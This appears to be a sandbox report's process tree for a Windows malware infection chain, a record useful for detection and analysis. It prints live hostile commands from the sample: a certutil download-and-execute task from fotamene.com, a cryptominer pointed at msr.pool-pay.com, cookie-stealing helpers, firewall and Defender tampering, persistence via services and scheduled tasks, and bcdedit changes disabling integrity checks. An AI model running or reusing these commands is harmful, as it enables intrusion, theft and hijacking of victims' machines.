PID 560 wrote to memory of 1320	560	C0CA61A12E4C8B38.exe	1615014393950.exe
PID 560 wrote to memory of 3964	560	C0CA61A12E4C8B38.exe	ThunderFW.exe
PID 560 wrote to memory of 3964	560	C0CA61A12E4C8B38.exe	ThunderFW.exe
PID 560 wrote to memory of 3964	560	C0CA61A12E4C8B38.exe	ThunderFW.exe
PID 560 wrote to memory of 2552	560	C0CA61A12E4C8B38.exe	MiniThunderPlatform.exe
PID 560 wrote to memory of 2552	560	C0CA61A12E4C8B38.exe	MiniThunderPlatform.exe
PID 560 wrote to memory of 2552	560	C0CA61A12E4C8B38.exe	MiniThunderPlatform.exe
PID 560 wrote to memory of 508	560	C0CA61A12E4C8B38.exe	23E04C4F32EF2158.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2412

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:560

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:3268

C:\Users\Admin\AppData\Roaming\1615014383700.exe
"C:\Users\Admin\AppData\Roaming\1615014383700.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014383700.txt"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3828

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:3672

C:\Users\Admin\AppData\Roaming\1615014388341.exe
"C:\Users\Admin\AppData\Roaming\1615014388341.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014388341.txt"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:2036

C:\Users\Admin\AppData\Roaming\1615014393950.exe
"C:\Users\Admin\AppData\Roaming\1615014393950.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014393950.txt"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1320

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
3⤵
- Executes dropped EXE
PID:3964

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:2552

C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
3⤵
- Executes dropped EXE
PID:508

C:\Users\Admin\AppData\Local\Temp\is-0JES5.tmp\23E04C4F32EF2158.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0JES5.tmp\23E04C4F32EF2158.tmp" /SL5="$601A2,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1124

C:\Program Files (x86)\DTS\seed.sfx.exe
"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2056

C:\Program Files (x86)\Seed Trade\Seed\seed.exe
"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3564

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/14Zhe7"
5⤵
- Checks computer location settings
PID:3672

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
3⤵
PID:1620

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:96

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:1904

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:2068

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:500

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
3⤵
- Runs ping.exe
PID:2292

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9F3416E4B4F3FAD8BF0096B5C537460E C
2⤵
- Loads dropped DLL
PID:4048

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2076

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1948

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:3752

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2784

C:\Users\Admin\AppData\Local\Temp\F2D9.exe
C:\Users\Admin\AppData\Local\Temp\F2D9.exe
1⤵
- Executes dropped EXE
PID:4132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo MFbR
2⤵
PID:4200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html
2⤵
PID:4248

C:\Windows\SysWOW64\cmd.exe
cmd
3⤵
PID:4296

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab
4⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
Sui.com Benedetto.txt
4⤵
PID:5188

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
5⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
6⤵
PID:6908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 1644
7⤵
- Program crash
PID:4288

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
4⤵
- Runs ping.exe
PID:5260

C:\Users\Admin\AppData\Local\Temp\F914.exe
C:\Users\Admin\AppData\Local\Temp\F914.exe
1⤵
- Executes dropped EXE
PID:4312

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\FABB.exe
C:\Users\Admin\AppData\Local\Temp\FABB.exe
1⤵
- Executes dropped EXE
PID:4376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ppbwgxsf\
2⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vmipgfjn.exe" C:\Windows\SysWOW64\ppbwgxsf\
2⤵
PID:4628

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ppbwgxsf binPath= "C:\Windows\SysWOW64\ppbwgxsf\vmipgfjn.exe /d\"C:\Users\Admin\AppData\Local\Temp\FABB.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:4816

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ppbwgxsf "wifi internet conection"
2⤵
PID:4924

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ppbwgxsf
2⤵
PID:5032

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:3160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4692

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4780

C:\Users\Admin\AppData\Local\Temp\F7C.exe
C:\Users\Admin\AppData\Local\Temp\F7C.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4972

C:\Users\Admin\AppData\Local\Temp\10A6.exe
C:\Users\Admin\AppData\Local\Temp\10A6.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5016

C:\Users\Admin\AppData\Local\Temp\10A6.exe
C:\Users\Admin\AppData\Local\Temp\10A6.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:3872

C:\Windows\SysWOW64\ppbwgxsf\vmipgfjn.exe
C:\Windows\SysWOW64\ppbwgxsf\vmipgfjn.exe /d"C:\Users\Admin\AppData\Local\Temp\FABB.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5096

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:4568

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
3⤵
PID:1272

C:\Users\Admin\AppData\Local\Temp\1CCD.exe
C:\Users\Admin\AppData\Local\Temp\1CCD.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3920

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
PID:4640

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\2615.exe
C:\Users\Admin\AppData\Local\Temp\2615.exe
1⤵
- Executes dropped EXE
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 360
2⤵
- Program crash
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 340
2⤵
- Program crash
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 376
2⤵
- Program crash
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 616
2⤵
- Program crash
PID:5112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 656
2⤵
- Program crash
PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 696
2⤵
- Program crash
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 596
2⤵
- Program crash
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 576
2⤵
- Program crash
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 808
2⤵
- Program crash
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 864
2⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 924
2⤵
- Program crash
PID:996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 904
2⤵
- Program crash
PID:4456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 716
2⤵
- Program crash
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 696
2⤵
- Program crash
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 936
2⤵
- Program crash
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 928
2⤵
- Program crash
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 972
2⤵
- Program crash
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 888
2⤵
- Program crash
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 576
2⤵
- Program crash
PID:5272

C:\Users\Admin\AppData\Local\Temp\2615.exe
"C:\Users\Admin\AppData\Local\Temp\2615.exe"
2⤵
PID:5604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 324
3⤵
- Program crash
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 304
3⤵
- Program crash
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 340
3⤵
- Program crash
PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 624
3⤵
- Program crash
PID:5888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 636
3⤵
- Program crash
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 648
3⤵
- Program crash
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 688
3⤵
- Program crash
PID:6060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 604
3⤵
- Program crash
PID:6112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 700
3⤵
- Program crash
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 724
3⤵
- Program crash
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 732
3⤵
- Program crash
PID:5144

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:5176

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:5332

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /15-15
3⤵
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 360
4⤵
- Program crash
PID:5800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 408
4⤵
- Program crash
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 424
4⤵
- Program crash
PID:6008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 632
4⤵
- Program crash
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 620
4⤵
- Program crash
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 700
4⤵
- Program crash
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 608
4⤵
- Program crash
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 616
4⤵
- Program crash
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 820
4⤵
- Program crash
PID:5960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 836
4⤵
- Program crash
PID:5620

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:5460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 860
4⤵
- Program crash
PID:2920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 884
4⤵
- Program crash
PID:5872

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 968
4⤵
- Program crash
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1424
4⤵
- Program crash
PID:5532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1360
4⤵
- Program crash
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1500
4⤵
- Program crash
PID:5140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1552
4⤵
- Program crash
PID:5972

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:5684

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
5⤵
- Modifies boot configuration data using bcdedit
PID:6824

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:6028

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:6804

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
5⤵
- Modifies boot configuration data using bcdedit
PID:4584

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:7156

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:4896

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
5⤵
- Modifies boot configuration data using bcdedit
PID:6368

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
5⤵
- Modifies boot configuration data using bcdedit
PID:5044

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
5⤵
- Modifies boot configuration data using bcdedit
PID:4584

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
5⤵
- Modifies boot configuration data using bcdedit
PID:4956

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
5⤵
- Modifies boot configuration data using bcdedit
PID:6992

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
5⤵
- Modifies boot configuration data using bcdedit
PID:6860

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
5⤵
- Modifies boot configuration data using bcdedit
PID:4256

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
5⤵
- Modifies boot configuration data using bcdedit
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 992
4⤵
- Program crash
PID:5864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1356
4⤵
- Program crash
PID:5380

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:6988

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
4⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1388
4⤵
- Program crash
PID:3232

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
4⤵
PID:3208

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:7008

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:7320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 888
4⤵
- Program crash
PID:1312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1584
4⤵
- Program crash
PID:1132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1612
4⤵
- Program crash
PID:8432

C:\Users\Admin\AppData\Local\Temp\29CF.exe
C:\Users\Admin\AppData\Local\Temp\29CF.exe
1⤵
PID:4176

C:\Users\Admin\AppData\Local\Temp\is-JPJ11.tmp\29CF.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JPJ11.tmp\29CF.tmp" /SL5="$402C6,442598,358912,C:\Users\Admin\AppData\Local\Temp\29CF.exe"
2⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\is-DUVFK.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-DUVFK.tmp\kkkk.exe" /S /UID=lab212
3⤵
PID:2500

C:\Program Files\Microsoft Office 15\USVLFTFWJB\prolab.exe
"C:\Program Files\Microsoft Office 15\USVLFTFWJB\prolab.exe" /VERYSILENT
4⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\is-VE9CT.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VE9CT.tmp\prolab.tmp" /SL5="$10308,575243,216576,C:\Program Files\Microsoft Office 15\USVLFTFWJB\prolab.exe" /VERYSILENT
5⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\29-2109b-b17-e178b-237e38baf6717\ZHowysilegu.exe
"C:\Users\Admin\AppData\Local\Temp\29-2109b-b17-e178b-237e38baf6717\ZHowysilegu.exe"
4⤵
PID:4920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3dexlkr.oq2\GcleanerWW.exe /mixone & exit
5⤵
PID:4428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe & exit
5⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe
6⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe
7⤵
PID:4840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gf43fkbd.swn\setup.exe /8-2222 & exit
5⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\gf43fkbd.swn\setup.exe
